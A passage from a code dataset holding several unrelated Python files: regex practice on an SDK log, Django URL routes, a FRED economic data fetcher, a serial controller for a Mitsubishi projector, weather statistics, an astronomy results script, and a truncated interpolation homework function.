print('--------------------------------------------------------------------')\n#\n# key = r'asdlfj;<html>hello</html>asdlf;j;lasdfa'\n# p1 = r'<[Hh][Tt][Mm][Ll]>.+?</[Hh][Tt][Mm][Ll]>'\n# pattern1 = re.compile(p1)\n# print(pattern1.findall(key))\n#\n# print('--------------------------------------------------------------------')\n#\n# key = r'mat cat hat pat'\n# p1 = r'[^p]at'\n# pattern1 = re.compile(p1)\n# print(pattern1.findall(key))\n#\n# print('--------------------------------------------------------------------')\n#\n# key = r'chuxiuhong@hit.edu.cn'\n# p1 = r'@.+?\\.'\n# pattern1 = re.compile(p1)\n# print(pattern1.findall(key))\n#\n#\n# print('--------------------------------------------------------------------')\n#\n# key = r'saas and sas and saaas'\n# p1 = r'sa{1,2}s'\n# pattern1 = re.compile(p1)\n# print(pattern1.findall(key))\n#\n# print('--------------------------------------------------------------------')\n#\n#\n# key = r'helloworldpython123'\n# p1 = r'python'\n# pattern1 = re.compile(p1)\n# ret = re.search(pattern1,key)\n# print(1,ret.group(0))\n#\n# print('--------------------------------------')\n#\n
# key = r'<html><body><h1>hello world</h1></body></html>'\n# p1 = r'<html>.+</html>'\n# pattern1 = re.compile(p1)\n# ret = re.search(pattern1,key)\n# print(2,ret.group(0))\n# print(3,pattern1.findall(key))\n#\n# print('--------------------------------------')\n#\n# key = r'asdfhkljhsadkfhklq6743@163.comasdfhhkasjdhfk'\n# p1 = r'klq.+com'\n# pattern1 = re.compile(p1)\n# ret = pattern1.findall(key)\n# print(ret)\n#\n# print('--------------------------------------')\n#\n# key = r'asdfasd;asdfhttp://www.baidu.com and https://www.google.comasdfa'\n# p1 = r'https*.+?com'\n# pattern1 = re.compile(p1)\n# ret = pattern1.findall(key)\n# print(ret[0],ret[1])\n#\n# print('--------------------------------------')\n#\n# key = r'asdfladskh<html>hello</html>asdlfhklh'\n# p1 = r'<[Hh][Tt][Mm][Ll]>.+?</[Hh][Tt][Mm][Ll]>'\n# pattern1 = re.compile(p1)\n# ret = pattern1.findall(key)\n# print(ret)\n#\n# print('--------------------------------------')\n#\n# key = r'mat cat hat pat'\n# p1 = r'[^pm]at'\n# pattern1 = re.compile(p1)\n# ret = pattern1.findall(key)\n# print(ret)\n#\n# print('--------------------------------------')\n#\n# str = r'www.google.com/ncr.666.777.888.999'\n# p1 = r'/.+?\\.'\n# pattern1 = re.compile(p1)\n# ret = pattern1.findall(str)\n# print(ret)\n#\n# print('--------------------------------------')\n#\n# str = r'chuxiuhong@hit.edu.cn'\n# p1 = r'@.+?\\.'\n# pattern1 = re.compile(p1)\n# ret = pattern1.findall(str)\n# print(ret)\n#\n# print('--------------------------------------')\n#\n# key = r'sassaassaaassaaaassaaasssaasssaassaaaas'\n# p1 = r'sa{1,}s'\n# pattern1 = re.compile(p1)\n# ret = pattern1.findall(key)\n# print(ret)\n#\n# print('--------------------------------------')\n# print('**************************************')\n# print('--------------------------------------')\n#\n# key = r'<html><body><h1>hello world</h1></body></html>'\n# p1 = r'(?<=<h1>).+?(?=</h1>)'\n# pattern1 = re.compile(p1)\n# matcher1 = pattern1.findall(key)\n# print(matcher1)\n#\n# print('--------------------------------------')\n#\n# key = r'<html><body><h1>hello world</h1></body></html>'\n# p1 = r'<h([1-6])>.*?</h\\1>'\n# pattern1 = re.compile(p1)\n# m1 = re.search(pattern1,key)\n# print(1,m1.group(0))
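\n\n# Added example (illustrative): greedy '.+' versus non-greedy '.+?' on the same text.\nsample = '<html>a</html> <html>b</html>'\nprint(re.findall(r'<html>.+</html>', sample))   # ['<html>a</html> <html>b</html>']\nprint(re.findall(r'<html>.+?</html>', sample))  # ['<html>a</html>', '<html>b</html>']\n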
\nprint('----------------test begin------------------\\n')\n\n\nkey = '[SYS][DEBUG][2018-03-04 20:01:47.079][GizWifiSDK.m:1401 +[GizWifiSDK startWithAppInfo:productInfo:cloudServiceInfo:autoSetDeviceDomain:]][start => appInfo: {]appId = \"ac0****89e\";appSecret = \"d2c****e28\";}, productInfo: [{\"productSecret\":\"d62****580\",\"productKey\":\"bc18803e55c5432185e18df96bb11c99\"}], cloudServiceInfo: (null), autoSetDeviceDomain: false'\n\np1 = r'appId.+?;'\npattern1 = re.compile(p1)\nret = pattern1.findall(key)\nprint(ret)\n\np2 = r'appSecret.+?;'\npattern2 = re.compile(p2)\nret = pattern2.findall(key)\nprint(ret)\n\np = r'productInfo.+'\npattern = re.compile(p)\nproductInfo = pattern.findall(key)\nprint(productInfo)\n\np = r'{\".+\"}'\npattern = re.compile(p)\npkPs = pattern.findall(key)\nprint(666,pkPs)\n\n\n# key = r\"[SYS][ERROR][2018-04-08 16:25:03.954][httpCommon.c:920 httpsSSLConnectByDomainPort][sslConnectByIPPort 119.29.47.111:443 failed, errorCode 8046]\"\nkey = r\"2018-04-08 16:25:03.954[httpCommon.c:920 httpsSSLConnectByDomainPort]sslConnectByIPPort 119.29.47.111:443 failed, errorCode 8046\"\n\np = r'\\[.+\\]'\npattern = re.compile(p)\nlistt = pattern.findall(key)\nprint(777,listt)\n\n\nprint('\\n-----------------test end-------------------')\n\n\n\n\n\n\n\n","sub_path":"debugHere/forTest/RegularExpression.py","file_name":"RegularExpression.py","file_ext":"py","file_size_in_byte":5874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"486068684","text":"from django.urls import path\nfrom . import views\n\napp_name = 'post-api'\n\n\nurlpatterns = [\n    path('post/list/', views.PostListAPIView.as_view(), name='list'),\n    path('post/detail/<int:pk>/', views.PostRetrieveUpdateDestroyAPIView.as_view(), name='detail'),\n    path('post/create/', views.PostCreateAPIView.as_view(), name='create'),\n    path('user/list/', views.UserListAPIView.as_view(), name='user'),\n    path('user/detail/<int:pk>/', views.UserRetrieveAPIView.as_view(), name='user-detail'),\n    path('comment-create/', views.CommentCreateAPIView.as_view(), name='comment_create'),\n]","sub_path":"post/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"563922343","text":"import requests\nimport datetime # stdlib\nimport tempfile # stdlib\nimport pandas as pd\n\n# get_fred() defaults\ntoday = datetime.datetime.now().strftime('%Y-%m-%d')\nstart_date_default = (pd.to_datetime(today) - pd.DateOffset(years = 5)).strftime('%Y-%m-%d')\nend_date_default = today\n\ndef get_fred(fred_id, start_date = start_date_default, end_date = end_date_default):\n    \"\"\"\n    Fetch time-series data from Federal Reserve Economic Data (FRED), provided\n    by the Federal Reserve Bank of St. Louis.\n\n    :param fred_id: ID string for FRED series\n\n    :param start_date: Start date for FRED series, as a string in the format\n                       YYYY-MM-DD. Defaults to five years prior to the date\n                       called.\n\n    :param end_date: End date for FRED series. Defaults to the date called.\n\n    :returns: A pandas `DataFrame`\n    \"\"\"\n    # Workaround for not asking for an API key, since the returned data is raw\n    # text. With a key, change this to GET from the API endpoint\n    try:\n        [datetime.datetime.strptime(d, '%Y-%m-%d') for d in [start_date, end_date]]\n    except ValueError:\n        raise ValueError('Bad date format! 
Must be YYYY-MM-DD')\n \n url = 'https://fred.stlouisfed.org/graph/fredgraph.csv'\n r = requests.get(f'{url}?id={fred_id}&cosd={start_date}&coed={end_date}')\n\n with tempfile.NamedTemporaryFile('w', delete = False) as f:\n f.write(r.text)\n tmpfile = f.name\n\n df = pd.read_csv(tmpfile)\n\n # Prep\n df['DATE'] = pd.to_datetime(df['DATE'])\n df['label'] = 'Actual'\n\n return df\n# end get_fred\n","sub_path":"python/fredcast/io/get.py","file_name":"get.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"356579949","text":"#Métodos para controlar el mezclador amplificador \r\n#Ecler CA40. Serán llamadas desde\r\n#control-CA40.py\r\n\r\nfrom serial import Serial\r\n# from serial.serialutil import SerialBase\r\n\r\n# class ex320(serial.Serial,SerialBase):\r\nclass device(Serial):\r\n\r\n\tstatus_dic = {\r\n\t\t\t'device_name' : \"Mitsubishi EX320U\",\r\n\t\t\t'power_status' : \"\",\r\n\t\t\t'av_mute': \"\",\r\n\t\t\t'source' : \"\",\r\n\t\t\t'volume' : 0,\r\n\t\t\t'lamp_hours' : 0,\r\n\t\t\t'lamp_minutes' : 0,\r\n\t\t\t'picturesetting': \"\",\r\n\t\t\t'contrast': 0,\r\n\t\t\t'brightness':0,\r\n\t\t\t'lampmode': \"\",\r\n\t\t\t'aspect': \"\"\r\n\t\t}\r\n\r\n\r\n\tdef __init__(self,ex320_port):\r\n\t\tsuper().__init__(ex320_port, timeout = 0.5)\r\n\t\t# Serial(ex320_port, timeout = 1)\r\n\r\n\t# def class_name(self):\r\n\t# \treturn self.__class__.__name__\r\n\r\n############################## CONSULTAS ############################################\r\n\r\n\r\n\tdef get_power(self):\r\n\t\tself.flush()\r\n\t\tself.write(b'00vP\\r')\r\n\t\tlee = self.read_until(\"\\r\")\r\n\t\tstatus = {\r\n\t\tb'00vP0\\r': \"OFF\",\r\n\t\tb'00vP1\\r': \"ON\"\r\n\t\t}\r\n\t\tself.status_dic['power_status'] = status.get(lee, \"?\")\r\n\t\treturn self.status_dic['power_status']\r\n\r\n\tdef get_avmute(self):\r\n\t\treturn self.status_dic['av_mute']\r\n\r\n\tdef get_source(self):\r\n\t\tself.flush()\r\n\t\tself.write(b'00vI\\r')\r\n\t\tlee = self.readline()\r\n\t\tsources ={\r\n\t\t\tb'00vIr1\\r': \"Computer 1\",\r\n\t\t\tb'00vIr2\\r': \"Computer 2\",\r\n\t\t\tb'00vIv1\\r': \"Video 1\",\r\n\t\t\tb'00vIv2\\r': \"S-Video\",\r\n\t\t\tb'00vId1\\r': \"HDMI\"\r\n\t\t}\r\n\t\tself.status_dic['source'] = sources.get(lee, \"?\")\r\n\t\treturn self.status_dic['source']\r\n\r\n\tdef get_volume(self):\r\n\t\tself.flush()\r\n\t\tself.write(b'00VL\\r')\r\n\t\tlee = self.readline()\r\n\t\tvol = str(lee).split(\"00VL\")[1].rstrip(\"\\\\r'\")\r\n\t\tif vol == \":N\":\r\n\t\t\tself.status_dic[\"volume\"] = 0\r\n\t\t\treturn \"0\"\r\n\t\telse:\r\n\t\t\tself.status_dic[\"volume\"] = vol\r\n\t\t\treturn str(int(vol))\r\n\r\n\tdef get_lamptime(self):\r\n\t\tself.flush()\r\n\t\tself.write(b'00vLE\\r')\r\n\t\tlee = self.readline()\r\n\t\thours = str(lee).split(\"00vLE\")[1].rstrip(\"\\\\r'\")[:4].lstrip(\"0\")\r\n\t\tminutes = str(lee).split(\"00vLE\")[1].rstrip(\"\\\\r'\")[4:]\r\n\t\tlamptime = {\r\n\t\t\t\"hours\": hours,\r\n\t\t\t\"minutes\": minutes\r\n\t\t}\r\n\t\tself.status_dic['lamp_hours'] = hours\r\n\t\tself.status_dic['lamp_minutes'] = minutes\r\n\t\treturn lamptime\r\n\r\n\tdef get_picturesetting(self):\r\n\t\tself.flush()\r\n\t\tself.write(b'00CE\\r')\r\n\t\tlee = self.readline()\r\n\t\tsetting = {\r\n\t\t\tb'00CE0\\r': \"Brightest\",\r\n\t\t\tb'00CE1\\r': \"Presentation\",\r\n\t\t\tb'00CE2\\r': \"Normal\",\r\n\t\t\tb'00CE3\\r': \"Theather\",\r\n\t\t\tb'00CE4\\r': \"User 1\",\r\n\t\t\tb'00CE5\\r': \"User 2\"\r\n\t\t}\r\n\t\tps = 
setting.get(lee, \"?\")\r\n\t\treturn ps\r\n\t \r\n\tdef get_contrast(self):\r\n\t\tself.flush()\r\n\t\tself.write(b'00PP\\r')\r\n\t\tlee = self.readline()\r\n\t\tcontrast = str(lee).split(\"00PP\")[1].rstrip(\"\\\\r'\")\r\n\t\tif contrast == \":N\":\r\n\t\t\treturn \"0\"\r\n\t\telse:\r\n\t\t\treturn str(int(contrast))\r\n\r\n\tdef get_brightness(self):\r\n\t\tself.flush()\r\n\t\tself.write(b'00QQ\\r')\r\n\t\tlee = self.readline()\r\n\t\tbrightness = str(lee).split(\"00QQ\")[1].rstrip(\"\\\\r'\")\r\n\t\tif brightness == \":N\":\r\n\t\t\treturn \"0\"\r\n\t\telse:\r\n\t\t\treturn str(int(brightness))\r\n\r\n\tdef get_lampmode(self):\r\n\t\tself.flush()\r\n\t\tself.write(b'00LM\\r')\r\n\t\tlee = self.readline()\r\n\t\tmode ={\r\n\t\t\tb'00LM0\\r': \"Standard\",\r\n\t\t\tb'00LM1\\r': \"Low\"\r\n\t\t}\r\n\t\tlampmode = mode.get(lee, \"?\")\r\n\t\treturn lampmode\r\n\r\n\tdef get_aspect(self):\r\n\t\tself.flush()\r\n\t\tself.write(b'00SC\\r')\r\n\t\tlee = self.readline()\r\n\t\taspect_ratio ={\r\n\t\t\tb'00SC0\\r': \"Auto\",\r\n\t\t\tb'00SC1\\r': \"Real\",\r\n\t\t\tb'00SC2\\r': \"4:3\",\r\n\t\t\tb'00SC3\\r': \"16:9\"\r\n\t\t}\r\n\t\taspect = aspect_ratio.get(lee, \"?\")\r\n\t\treturn aspect\r\n\r\n\r\n\tdef get_status(self):\r\n\t\tself.status_dic['power_status'] = self.get_power()\r\n\t\tself.status_dic['av_status'] = self.get_avmute()\r\n\t\tself.status_dic['source'] = self.get_source()\r\n\t\tself.status_dic['vol'] = self.get_volume()\r\n\t\tself.status_dic['lamp_hours'] = self.get_lamptime()[\"hours\"]\r\n\t\tself.status_dic['lamp_minutes'] = self.get_lamptime()[\"minutes\"]\r\n\t\tself.status_dic['lampmode'] = self.get_lampmode()\r\n\t\tself.status_dic['picturesetting'] = self.get_picturesetting()\r\n\t\tself.status_dic['contrast'] = self.get_contrast()\r\n\t\tself.status_dic['brightness'] = self.get_brightness()\r\n\t\tself.status_dic['aspect'] = self.get_aspect()\r\n\t\treturn self.status_dic\r\n\r\n\tdef get_status_dic(self):\r\n\t\treturn self.status_dic\r\n\r\n########### Menú de opciones\r\n\r\n\tdef menu(self):\r\n\t\tprint(\"----------------------------------------\")\r\n\t\tprint(\"Control de selfector Mitsubishi EX320\")\r\n\t\tprint(\"----------------------------------------\")\r\n\t\tprint(\"-----------------------\")\r\n\t\tprint(\" Estado encendido: \" + get_power_status())\r\n\t\tlamp = lamptime()\r\n\t\tprint(\" Horas de lámpara: \" + lamp[0] + \" horas, \" + lamp[1] +\" minutos.\")\r\n\t\tprint(\" Fuente de vídeo: \" + get_source())\r\n\t\tprint(\" Volumen altavoz: \" + get_vol())\r\n\t\tprint(\" Configuración de imagen: \" + get_picturesetting())\r\n\t\tprint(\" Contraste: \" + get_contrast())\r\n\t\tprint(\" Brillo: \" + get_brightness())\r\n\t\tprint(\" Modo de lámpara: \" + get_lampmode())\r\n\t\tprint(\" Relación de aspecto: \" + get_aspect())\r\n\t\tprint(\"-----------------------\")\r\n\t\tprint(\"1.Enciende\")\r\n\t\tprint(\"2.Apaga\")\r\n\t\tprint(\"3.AV Mute ON\")\r\n\t\tprint(\"4.AV Mute OFF\")\r\n\t\tprint(\"5.Source Computer 1\")\r\n\t\tprint(\"6.Source Computer 2\")\r\n\t\tprint(\"7.Source video 1\")\r\n\t\tprint(\"8.Source S-Video\")\r\n\t\tprint(\"9.Source HDMI\")\r\n\t\tprint(\"q.Vol +\")\r\n\t\tprint(\"w.Vol -\")\r\n\t\tprint(\"x.Salir\")\r\n\r\n\r\n\r\n######################## OPERACIONES BÁSICAS ################################\r\n\r\n\tdef set_power(self, ON_OFF):\r\n\t\tself.flush()\r\n\t\tpower ={\r\n\t\t\t\"ON\": b'00!\\r',\r\n\t\t\t\"OFF\": b'00\"\\r'\r\n\t\t}\r\n\t\tenvio = 
power.get(ON_OFF)\r\n\t\ttry:\r\n\t\t\tself.write(envio)\r\n\t\t\tself.status_dic[\"power_status\"] = ON_OFF\r\n\t\t\treturn True\r\n\t\texcept:\r\n\t\t\treturn False\r\n\r\n\tdef set_avmute(self, ON_OFF):\r\n\t\tself.flush()\r\n\t\tmute ={\r\n\t\t\t\"ON\": b'00MUTE1\\r',\r\n\t\t\t\"OFF\": b'00MUTE0\\r'\r\n\t\t}\r\n\t\tenvio = mute.get(ON_OFF)\r\n\t\ttry:\r\n\t\t\tself.write(envio)\r\n\t\t\tself.status_dic[\"av_mute\"] = ON_OFF\r\n\t\t\treturn True\r\n\t\texcept:\r\n\t\t\treturn False\r\n\r\n\t\r\n\t# def av_mute_on(self):\r\n\t# \tself.flush()\r\n\t# \tself.write(b'00MUTE1\\r')\r\n\t# \tlee = self.readline()\r\n\r\n\t# def av_mute_off(self):\r\n\t# \tself.flush()\r\n\t# \tself.write(b'00MUTE0\\r')\r\n\t# \tlee = self.readline()\r\n\t# \tprint(\"av_mute_off\")\r\n\r\n\tdef set_source(self, source):\r\n\t\tself.flush()\r\n\t\tsources ={\r\n\t\t\t\"Computer 1\": b'00_r1\\r',\r\n\t\t\t\"Computer 2\": b'00_r2\\r',\r\n\t\t\t\"Video 1\": b'00_v1\\r',\r\n\t\t\t\"S-Video\": b'00_v2\\r',\r\n\t\t\t\"HDMI\": b'00_d1\\r'\r\n\t\t}\r\n\t\tenvio = sources.get(source)\r\n\t\ttry:\r\n\t\t\tself.write(envio)\r\n\t\t\tself.status_dic[\"source\"] = source\r\n\t\t\treturn True\r\n\t\texcept:\r\n\t\t\treturn False\r\n\r\n######### Ajuste de imagen\r\n\tdef set_picturesetting(self, mode):\r\n\t\tself.flush()\r\n\t\tsetting ={\r\n\t\t\t\"Brightest\": b'00CE0\\r',\r\n\t\t\t\"Presentation\": b'00CE1\\r', \r\n\t\t\t\"Normal\": b'00CE2\\r',\r\n\t\t\t\"Theather\": b'00CE3\\r', \r\n\t\t\t\"User1\": b'00CE4\\r',\r\n\t\t\t\"User2\": b'00CE5\\r' \r\n\t\t}\r\n\t\tenvio = setting.get(mode)\r\n\t\ttry:\r\n\t\t\tself.write(envio)\r\n\t\t\tself.status_dic[\"picturesetting\"] = mode\r\n\t\t\treturn True\r\n\t\texcept:\r\n\t\t\treturn False\r\n\r\n\tdef set_contrast(self, value):\r\n\t\tself.flush()\r\n\t\tif int(value) > 0:\r\n\t\t\tvalue_ok = (\"+\" + value).zfill(3)\r\n\t\telif int(value) < 0:\r\n\t\t\tvalue_ok = value.zfill(3)\r\n\t\telse:\r\n\t\t\tvalue_ok = \"000\"\r\n\t\tenvio = \"00PP\"+ value_ok + \"\\r\"\r\n\t\ttry:\r\n\t\t\tself.write(envio.encode())\r\n\t\t\tself.status_dic[\"contrast\"] = value\r\n\t\t\treturn True\r\n\t\texcept:\r\n\t\t\treturn False\r\n\r\n\r\n\tdef set_brightness(self, value):\r\n\t\tself.flush()\r\n\t\tenvio = \"00QQ\" + value.zfill(3) + \"\\r\"\r\n\t\ttry:\r\n\t\t\tself.write(envio.encode())\r\n\t\t\tself.status_dic[\"brightness\"] = value\r\n\t\t\treturn True\r\n\t\texcept:\r\n\t\t\treturn False\r\n\r\n\r\n\tdef set_lampmode(self, mode):\r\n\t\tself.flush()\r\n\t\tself.write(b'00LM\\r')\r\n\t\tlee = self.readline()\r\n\t\tmodes ={\r\n\t\t\t\"Standard\": b'00LM0\\r',\r\n\t\t\t\"Low\": b'00LM1\\r'\r\n\t\t}\r\n\t\tenvio = modes.get(mode)\r\n\t\ttry:\r\n\t\t\tself.write(envio)\r\n\t\t\tself.status_dic[\"lampmode\"] = mode\r\n\t\t\treturn True\r\n\t\texcept:\r\n\t\t\treturn False\r\n\r\n\tdef set_aspect(self, mode):\r\n\t\tself.flush()\r\n\t\taspect ={\r\n\t\t\t\"Auto\": b'00SC0\\r',\r\n\t\t\t\"Real\": b'00SC1\\r',\r\n\t\t\t\"4:3\": b'00SC2\\r',\r\n\t\t\t\"16:9\": b'00SC3\\r'\r\n\t\t}\r\n\t\tenvio = aspect.get(mode)\r\n\t\ttry:\r\n\t\t\tself.write(envio)\r\n\t\t\tself.status_dic[\"aspect\"] = mode\r\n\t\t\treturn True\r\n\t\texcept:\r\n\t\t\treturn False\r\n\r\n########## Ajuste de audio\r\n\r\n\tdef set_volume(self,up_down):\r\n\t\tself.flush()\r\n\t\tif up_down == \"up\":\r\n\t\t\ttry:\r\n\t\t\t\tself.write(b'00r06\\r')\r\n\t\t\t\tvol = self.get_volume()\r\n\t\t\t\tif vol < 10:\r\n\t\t\t\t\tvol+=1\r\n\t\t\t\tself.status_dic[\"volume\"] = vol\r\n\t\t\t\treturn 
True\r\n\t\t\texcept:\r\n\t\t\t\treturn False\r\n\t\telif up_down == \"down\":\r\n\t\t\ttry:\r\n\t\t\t\tself.write(b'00r07\\r')\r\n\t\t\t\tvol = self.get_volume()\r\n\t\t\t\tif vol > 0:\r\n\t\t\t\t\tvol-=1\r\n\t\t\t\tself.status_dic[\"volume\"] = vol\r\n\t\t\t\treturn True\r\n\t\t\texcept:\r\n\t\t\t\treturn False\r\n\t\telse:\r\n\t\t\treturn False","sub_path":"aplicacion/vp_ex320u.py","file_name":"vp_ex320u.py","file_ext":"py","file_size_in_byte":8516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"49067409","text":"def get_weather_stats():\n #import packages\n import pandas as pd\n import numpy as np\n import os\n from python_pkg import python_udf as udf\n import time\n import datetime\n #import project modules\n try:\n os.chdir('C:/Users/Joe/Projects/perfect_city')\n except:\n os.chdir('/home/jchristo/Projects/perfect_city/')\n import data_setup_functions\n\n\n # =============================================================================\n # Data Cleaning\n # =============================================================================\n #Read in data\n df = pd.read_csv('https://raw.githubusercontent.com/jchristo12/perfect_city/master/data_files/weather_data.csv')\n\n #total days\n total_days = len(df['date'].unique())\n\n #fix leading zero problem\n df['location'] = df['location'].map(lambda x: str(x).zfill(7))\n\n #fix NaN for precip cols\n #replace NaN in precipAccumulation with zero\n df.loc[df['precipAccumulation'].isna(), 'precipAccumulation'] = 0\n #replace NaN in precipType with 'None'\n df.loc[df['precipType'].isna(), 'precipType'] = 'none'\n\n #Replace unicode date with datetime\n df['new_date'] = df['date'].map(lambda x: datetime.datetime.fromtimestamp(x))\n #get the year and month\n df['year'] = df['new_date'].map(lambda x: x.year)\n df['month'] = df['new_date'].map(lambda x: x.month)\n #convert year and month columns to categories\n df = df.astype({'year': 'category', 'month': 'category'})\n\n #Create dict of seasons\n seasons = {'winter': [12,1,2],\n 'spring': [3,4,5],\n 'summer': [6,7,8],\n 'fall': [9,10,11]}\n #flip the dict\n seasons_alt = udf.dict_key_value_flip(seasons)\n #create a feature that is the season\n df['season'] = df['month'].apply(lambda x: seasons_alt[x])\n\n #create length of data feature and drop orig columns\n df['day_length'] = (df['sunsetTime'] - df['sunriseTime']) / 3600\n df.drop(['sunriseTime', 'sunsetTime'], axis=1, inplace=True)\n\n\n #Summarize the features\n stats = ['mean', 'std']\n\n #Get the temperatures for summer and winter\n #store only winter and summer data\n summer_winter_df = df[(df['season'] == 'winter') | (df['season'] == 'summer')]\n\n seas_temps = summer_winter_df.groupby(by=['location', 'season']).agg({'temperatureHigh': 'mean',\n 'temperatureLow': 'mean'})\n seas_temps_unstack = seas_temps.unstack(level=1)\n seas_temps_unstack.columns = seas_temps_unstack.columns.droplevel(0)\n #seas_temps_unstack[('temperatureHigh', 'summer')]\n\n\n #Number of precip days\n df['precipBinary'] = pd.Series(np.where(df['precipType'] != 'none', 1, 0))\n precip_days_df = df.groupby(by='location').agg({'precipBinary': 'sum'}) / total_days\n\n #Snow levels\n snow_rank = df[df['precipType'] == 'snow'].groupby(by=['location'], sort=False).agg({'precipAccumulation': 'sum'}).rank(method='min', pct=True)\n\n #Number of snow days\n df['snowBinary'] = pd.Series(np.where((df['precipType'] == 'snow') & (df['precipAccumulation'] != 0), 1, 0))\n snow_days_df = df.groupby(by='location').agg({'snowBinary': 
'sum'}) / total_days\n\n df['highUV'] = pd.Series(np.where(df['uvIndex'] > 6, 1, 0))\n high_UV_df = df.groupby(by='location').agg({'highUV': 'sum'}) / total_days\n #high_UV_df.sort_values(by='highUV', ascending=False)\n\n #Average summer day length\n day_length_df = df.groupby(by=['location', 'season']).agg({'day_length': 'mean'}).unstack(level=1)\n #drop multilevel column\n day_length_df.columns = day_length_df.columns.droplevel(0)\n\n #Cloudy percent\n df['sunnyBinary'] = np.where(df['cloudCover'] >= 0.5, 0, 1)\n sunny_df = df.groupby(by=['location']).agg({'sunnyBinary': 'sum'}) / total_days\n\n\n #merge all data together\n all_weather_stats = seas_temps_unstack.merge(precip_days_df, how='left', right_index=True, left_index=True).\\\n merge(snow_rank, how='left', right_index=True, left_index=True).\\\n merge(snow_days_df, how='left', right_index=True, left_index=True).\\\n merge(high_UV_df, how='left', right_index=True, left_index=True).\\\n merge(day_length_df, how='left', right_index=True, left_index=True).\\\n merge(sunny_df, how='left', right_index=True, left_index=True)\n\n #rename columns in final df\n all_weather_stats.columns = ['summerHigh', 'winterHigh', 'summerLow', 'winterLow', 'rainyDays', 'snowAmtRank', 'snowyDays', 'highUV',\n 'fallDayLength', 'springDayLength', 'summerDayLength', 'winterDayLength', 'sunnyDays']\n\n #fix missing data\n all_weather_stats['snowAmtRank'].fillna(0, inplace=True)\n\n #prep for use in main module\n all_weather_stats = all_weather_stats.reset_index()\n all_weather_stats.rename(columns={'location': 'id'}, inplace=True)\n\n return all_weather_stats\n\nif __name__ == \"__main__\":\n pass\n","sub_path":"data_pipelines/weather_analysis.py","file_name":"weather_analysis.py","file_ext":"py","file_size_in_byte":4976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"191658317","text":"\nimport os\nfrom glob import glob\nimport sys\nsys.path.insert(0, '../data/')\nimport matplotlib.pyplot as plt\nfrom datacleaner import LightCurve\nfrom results import BestLightCurve, MCMCResults, plot_star\nfrom cleanfit import T14b2aRsi\nimport batman\nimport numpy as np\n\n#results_dir = '/astro/store/scratch/tmp/bmmorris/stsp/kepler17/window229/run002/'\n\nwindow_ind, run_ind = sys.argv[-2:]\n# results_dir = ('/astro/store/scratch/tmp/bmmorris/stsp/kepler17/window{0:03d}/run{1:03d}/'\n#results_dir = ('/local/tmp/osg/hat11-osg/window{0:03d}/run{1:03d}/'\n#results_dir = ('/local/tmp/osg/hat11-osg/window{0:03d}/run{1:03d}/'\nresults_dir = ('/local/tmp/osg/tmp/hat11-osg/window{0:03d}/run{1:03d}/'\n .format(int(window_ind), int(run_ind)))\n#if not os.path.exists(results_dir):\n\nprint('Results from: {0}'.format(results_dir))\n#results_dir = '/astro/store/scratch/tmp/bmmorris/stsp/kepler17/window101/run009/'\n#results_dir = os.path.abspath('../condor/tmp/')\n\nfiles_in_dir = glob(os.path.join(results_dir, '*.txt'))\n\nfor output_file in files_in_dir:\n if output_file.endswith('_errstsp.txt'):\n error_path = output_file\n elif output_file.endswith('_finalparam.txt'):\n final_params_path = output_file\n elif output_file.endswith('_lcbest.txt'):\n best_lc_path = output_file\n elif output_file.endswith('_mcmc.txt'):\n mcmc_path = output_file\n elif output_file.endswith('_parambest.txt'):\n\n best_params_path = output_file\n\nwindow_dir = os.sep.join(results_dir.split(os.sep)[:-2])\nmcmc_paths = glob(window_dir + '/run???/*_mcmc.txt')\n\ntry:\n print(best_lc_path)\nexcept NameError:\n raise ValueError(\"{0} doesn't 
exist.\".format(results_dir))\n\n\ndef hat11_params():\n from hat11 import planet_properties, stellar_properties\n params = batman.TransitParams()\n params.t0 = planet_properties['first_mid_transit_time'] #time of inferior conjunction\n params.per = planet_properties['period'] #orbital period\n params.rp = planet_properties['transit_depth'] #planet radius (in units of stellar radii)\n b = planet_properties[\"impact_parameter\"]\n #inclination = 88.94560#np.arccos(b/params.a)\n params.inc = planet_properties['inclination'] #orbital inclination (in degrees)\n params.duration = planet_properties['transit_duration_days']\n\n ecosw = planet_properties['ecosw']\n esinw = planet_properties['esinw']\n eccentricity = np.sqrt(ecosw**2 + esinw**2)\n omega = np.degrees(np.arccos(ecosw/eccentricity))\n\n a, _ = T14b2aRsi(params.per, params.duration, b, params.rp, eccentricity, omega)\n\n params.a = a #semi-major axis (in units of stellar radii)\n\n params.ecc = eccentricity #eccentricity\n params.w = omega #longitude of periastron (in degrees)\n params.u = list(map(float, stellar_properties['four_param_limb_darkening'].split(' '))) #limb darkening coefficients; list() because map() is lazy in Python 3\n params.limb_dark = \"nonlinear\" #limb darkening model\n return params\n\ntransit_params = hat11_params()#get_basic_kepler17_params()\nblc = BestLightCurve(best_lc_path, transit_params=transit_params)\nblc.plot_whole_lc()\n#blc.plot_transits()\n#plt.show()\n\nmcmc = MCMCResults(mcmc_paths)\nprint('Acceptance rate: {0}'.format(str(mcmc.acceptance_rates)))\nmcmc.plot_chi2()\nmcmc.plot_chains()\n#mcmc.plot_star()\n#mcmc.plot_corner()\n#mcmc.plot_each_spot()\nplt.show()\n","sub_path":"sun_inactive/results.py","file_name":"results.py","file_ext":"py","file_size_in_byte":3445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"493303409","text":"## COMP1730/6730 S2 2018 - Homework 5\n# Submission is due 9am, Monday the 1st of October, 2018.\n\n## YOUR ANU ID: u6633756\n## YOUR NAME: Junming Zhao\n\n## Implement the function interpolate below.\n## (The statement \"pass\" is just a placeholder that does nothing: you\n## should replace it.)\n## You can define other functions if it helps you decompose the problem\n## and write a better organised and/or more readable solution.\n\n\ndef interpolate(x, y, x_test):\n '''Computes the linear interpolation of an unknown function with corresponding points in two sequences at a new point.'''\n x_low = findx(x, x_test)\n x_high = x[x.index(x_low) + 1]\n y_low = y[x.index(x_low)]\n y_high = y[x.index(x_high)]\n k = (y_high - y_low) / (x_high - x_low)\n b = y_low - k * x_low\n y_test = k * x_test + b\n return y_test\n\n\ndef 